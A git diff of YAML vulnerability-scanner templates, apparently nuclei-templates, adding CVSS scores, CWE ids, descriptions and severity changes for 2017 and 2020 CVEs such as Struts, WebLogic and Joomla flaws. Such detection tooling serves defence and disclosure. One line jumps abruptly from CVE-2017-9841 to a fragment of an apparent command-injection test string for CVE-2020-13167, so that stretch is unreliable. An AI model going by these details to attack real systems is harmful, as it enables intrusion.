a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -11,6 +11,11 @@ info: - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 tags: cve,cve2017,graphite,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-18638 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 5ccba81a04..0e0bff68e3 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -9,6 +9,10 @@ info: reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.40 + cve-id: CVE-2017-3506 requests: - raw: diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index 2003bf9c99..b172154381 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -3,11 +3,17 @@ id: CVE-2017-3528 info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko - severity: low + severity: medium reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 tags: oracle,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2017-3528 + cwe-id: CWE-601 + description: "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)." requests: - method: GET diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml index 3e200f2bf4..e852d525d0 100644 --- a/cves/2017/CVE-2017-3881.yaml +++ b/cves/2017/CVE-2017-3881.yaml @@ -10,6 +10,11 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. tags: cve,cve2017,cisco,rce,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-3881 + cwe-id: CWE-20 network: - inputs: diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml index 23b1ffb9b3..835026085e 100644 --- a/cves/2017/CVE-2017-4011.yaml +++ b/cves/2017/CVE-2017-4011.yaml @@ -10,6 +10,11 @@ info: - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 tags: cve,cve2017,mcafee,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-4011 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index f7e9caec0e..75f2ff83e6 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -3,12 +3,17 @@ id: CVE-2017-5487 info: name: WordPress Core < 4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo,geeknik - severity: info + severity: medium description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://www.exploit-db.com/exploits/41497 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2017-5487 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml index 3421006395..7c792b2225 100644 --- a/cves/2017/CVE-2017-5521.yaml +++ b/cves/2017/CVE-2017-5521.yaml @@ -2,12 +2,17 @@ id: CVE-2017-5521 info: name: Bypassing Authentication on NETGEAR Routers author: princechaddha - severity: medium + severity: high description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server. reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-5521 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index ad22c9704a..0d112f3194 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -6,6 +6,11 @@ info: description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. tags: cve,cve2017,struts,rce,apache reference: https://github.com/mazen160/struts-pwn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-5638 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index f9c76aab23..38352df854 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -3,9 +3,15 @@ id: CVE-2017-6090 info: name: PhpCollab (unauthenticated) Arbitrary File Upload author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,phpcollab,rce,fileupload reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-6090 + cwe-id: CWE-434 + description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." requests: - raw: diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 82e8e080d4..533586dd4f 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml @@ -9,6 +9,11 @@ info: - https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py tags: cve,cve2017,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-7269 + cwe-id: CWE-119 requests: - method: OPTIONS diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml index a3ebfb4f8d..b17e18d01d 100644 --- a/cves/2017/CVE-2017-7391.yaml +++ b/cves/2017/CVE-2017-7391.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/dweeves/magmi-git/issues/522 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-7391 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index de43a2eddc..cadec418f8 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -15,6 +15,11 @@ info: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - https://www.exploit-db.com/exploits/41890 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-7615 + cwe-id: CWE-640 requests: - method: GET diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml index d3dde0e997..5a1fbdfe03 100644 --- a/cves/2017/CVE-2017-7921.yaml +++ b/cves/2017/CVE-2017-7921.yaml @@ -2,12 +2,17 @@ id: CVE-2017-7921 info: name: Hikvision Authentication Bypass author: princechaddha - severity: high + severity: critical description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-7921 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index ccad58de39..a4968604e8 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml @@ -2,10 +2,15 @@ id: CVE-2017-8917 info: name: Joomla SQL Injection author: princechaddha - severity: high + severity: critical description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. reference: https://www.cvedetails.com/cve/CVE-2017-8917/ tags: cve,cve2017,joomla,sqli + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-8917 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml index cbd278de96..365d6c0957 100644 --- a/cves/2017/CVE-2017-9140.yaml +++ b/cves/2017/CVE-2017-9140.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2017,xss,telerik description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index da92a85868..843b3c84d2 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -7,6 +7,11 @@ info: description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9288 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 30ca442da3..d97ed4f5c8 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -3,13 +3,18 @@ id: CVE-2017-9506 info: name: Jira IconURIServlet SSRF author: pdteam - severity: high + severity: medium description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). reference: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 tags: cve,cve2017,atlassian,jira,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9506 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index 0b2bfa1813..a7acef344d 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml @@ -9,6 +9,11 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html tags: cve,cve2017,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-9791 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 008a0df385..3fbcb5b5e2 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -3,12 +3,17 @@ id: CVE-2017-9805 info: name: Apache Struts2 S2-052 RCE author: pikpikcu - severity: critical + severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-9805 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index c2ae610bf1..10a07fec84 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -7,6 +7,11 @@ info: description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) tags: cve,cve2017,dotnetnuke,bypass reference: https://github.com/murataydemir/CVE-2017-9822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-9822 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 0a1de31159..bb1e917308 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -3,7 +3,7 @@ id: CVE-2017-9841 info: name: CVE-2017-9841 author: Random_Robbie,pikpikcu - severity: high + severity: critical description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " /usr/local/netsweeper/webadmin/out' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13167 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index 93175bfeeb..943d37ec28 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -3,10 +3,15 @@ id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS author: pikpikcu - severity: high + severity: medium reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. tags: cve,cve2020,xss,bitrix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index 844a1401f5..13693b822a 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -10,6 +10,11 @@ info: It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. tags: cve,cve2020,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 requests: - method: GET diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index 4d8a08fa63..b9095c970e 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -5,6 +5,14 @@ info: author: pdteam severity: critical tags: cve,cve2020,apache,airflow,unauth + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13927 + description: "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default" + reference: + - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E + - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html requests: - method: GET diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index be27c3f3a9..28936101f5 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -15,6 +15,11 @@ info: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html tags: cve,cve2020,apache + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-13937 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml index 6f29058963..45757b968d 100644 --- a/cves/2020/CVE-2020-13942.yaml +++ b/cves/2020/CVE-2020-13942.yaml @@ -15,6 +15,11 @@ info: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 tags: cve,cve2020,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13942 + cwe-id: CWE-74 requests: - method: POST diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml index d23c7a5782..50f652bb22 100644 --- a/cves/2020/CVE-2020-14092.yaml +++ b/cves/2020/CVE-2020-14092.yaml @@ -7,6 +7,11 @@ info: description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. reference: https://wpscan.com/vulnerability/10287 tags: cve,cve2020,wordpress,wp-plugin,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14092 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-14179.yaml b/cves/2020/CVE-2020-14179.yaml index 116f824ef7..d586846e72 100644 --- a/cves/2020/CVE-2020-14179.yaml +++ b/cves/2020/CVE-2020-14179.yaml @@ -7,6 +7,10 @@ info: description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1. reference: https://jira.atlassian.com/browse/JRASERVER-71536 tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14179 requests: - method: GET diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml index d50f1e806d..a71ed9dfb5 100644 --- a/cves/2020/CVE-2020-14181.yaml +++ b/cves/2020/CVE-2020-14181.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-71560 - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14181 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml index 5cbe2e48a3..e260ce4ca9 100644 --- a/cves/2020/CVE-2020-14413.yaml +++ b/cves/2020/CVE-2020-14413.yaml @@ -7,6 +7,11 @@ info: reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. tags: cve,cve2020,nedi,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-14413 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index 65f3b7b0f5..f46615666a 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -10,6 +10,10 @@ info: - https://www.oracle.com/security-alerts/cpuoct2020.html additional-fields: cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-14864 requests: - method: GET diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 8544701f97..50635623d5 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -18,6 +18,10 @@ info: attacker with network access via HTTP to compromise the server. Successful attacks of this vulnerability can result in takeover. tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14882 requests: - raw: diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 9deaa4c983..92e76199c0 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -3,10 +3,14 @@ id: CVE-2020-14883 info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam - severity: critical + severity: high description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-14883 requests: - method: POST diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml index a40edb0ae6..3b46eec92a 100644 --- a/cves/2020/CVE-2020-15129.yaml +++ b/cves/2020/CVE-2020-15129.yaml @@ -7,6 +7,11 @@ info: description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios. reference: https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik tags: cve,cve2020,traefik,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.70 + cve-id: CVE-2020-15129 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml index 247fac361d..1d65d8a045 100644 --- a/cves/2020/CVE-2020-15148.yaml +++ b/cves/2020/CVE-2020-15148.yaml @@ -3,11 +3,17 @@ id: CVE-2020-15148 info: name: Yii 2 (yiisoft/yii2) RCE author: pikpikcu - severity: high + severity: critical reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md tags: cve,cve2020,rce,yii + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-15148 + cwe-id: CWE-502 + description: "Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory." requests: - method: GET diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml index 474fa19f0a..e483393043 100644 --- a/cves/2020/CVE-2020-15227.yaml +++ b/cves/2020/CVE-2020-15227.yaml @@ -3,7 +3,7 @@ id: CVE-2020-15227 info: name: Nette Framework RCE author: becivells - severity: high + severity: critical description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 @@ -11,6 +11,11 @@ info: - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md tags: cve,cve2020,nette,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml index 910bd856be..b197b0e2de 100644 --- a/cves/2020/CVE-2020-15500.yaml +++ b/cves/2020/CVE-2020-15500.yaml @@ -8,6 +8,12 @@ info: - 